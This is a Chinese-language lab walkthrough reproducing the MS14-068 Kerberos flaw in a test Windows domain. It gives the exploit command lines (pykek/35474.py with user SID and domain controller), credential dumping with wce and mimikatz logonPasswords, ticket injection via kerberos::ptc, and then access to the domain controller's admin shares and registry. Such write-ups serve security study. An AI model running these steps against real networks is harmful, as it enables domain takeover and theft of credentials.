• Ms14-068 • 庫 • https://github.com/bidord/pykek • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com • 拷貝 TGT_user1@lab.com.ccache 到windows系統 • 本地管理員登陸 • mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit
現在使用域管理的情況越來越多了 (域是一個微軟的自己的定義 安全邊界)
拿到域管理的權限
前提
你要有本機的管理員權限
這個漏洞如果成功 你就可以在一台普通的域成員的電腦上獲得域管理的權限
0X02所以這個環境需要在一個域里面實現
讓我們的2003加入域
右鍵電腦屬性 然后加入域 然后輸入一個有域管理權限的賬號
在域控下輸入 為域成員分配賬號
dsa.msc
然后我們老規矩 在kali里面搜索看看有沒有這個漏洞的exp
0X03復現
root@kali:~# searchsploit ms14-068 --------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------- ---------------------------------------- Microsoft Windows Kerberos - Privilege | exploits/windows/remote/35474.py --------------------------------------- ---------------------------------------- Shellcodes: No Result
wce抓取明文密碼
兩個::就是mimikatz的幫助
域里面的賬號啊計算機都會出來
找密碼 logonPasswords
現在開始利用漏洞
先找到sid
用kali生成票據
S-1-5-21-4100994999-1504190964-414678929-1118
如果你的kali的python沒有相關的模板這里下載
https://github.com/bidord/pykek
完整代碼
root@kali:~# python 35474.py -u zhong2@ZHONGQI.com -s S-1-5-21-4100994999-1504190964-414678929-1118 -d DC.zhongqi.com
這里由於我們的kali不在域里面所以我們用域控ip
root@kali:~# python 35474.py -u zhong2@ZHONGQI.com -s S-1-5-21-4100994999-1504190964-414678929-1118 -d 192.168.1.132
然后我們把票據拷貝到win2003域成員上面去 這里不是
把票據放在和mimikatz一起
• mimikatz.exe kerberos::ptc TGT_zhong2@ZHONG.com.ccache
然后就直接把本地管理提升為域管理
SID在任何ip上都是不變的
成功了后我們在本地管理連接DC的C盤
\\DC.ZHONGQI.COM\c$
或者看管理共享
\\DC.ZHONGQI.COM\admin$
也可以連接訪問DC的注冊表
regedit
成功訪問
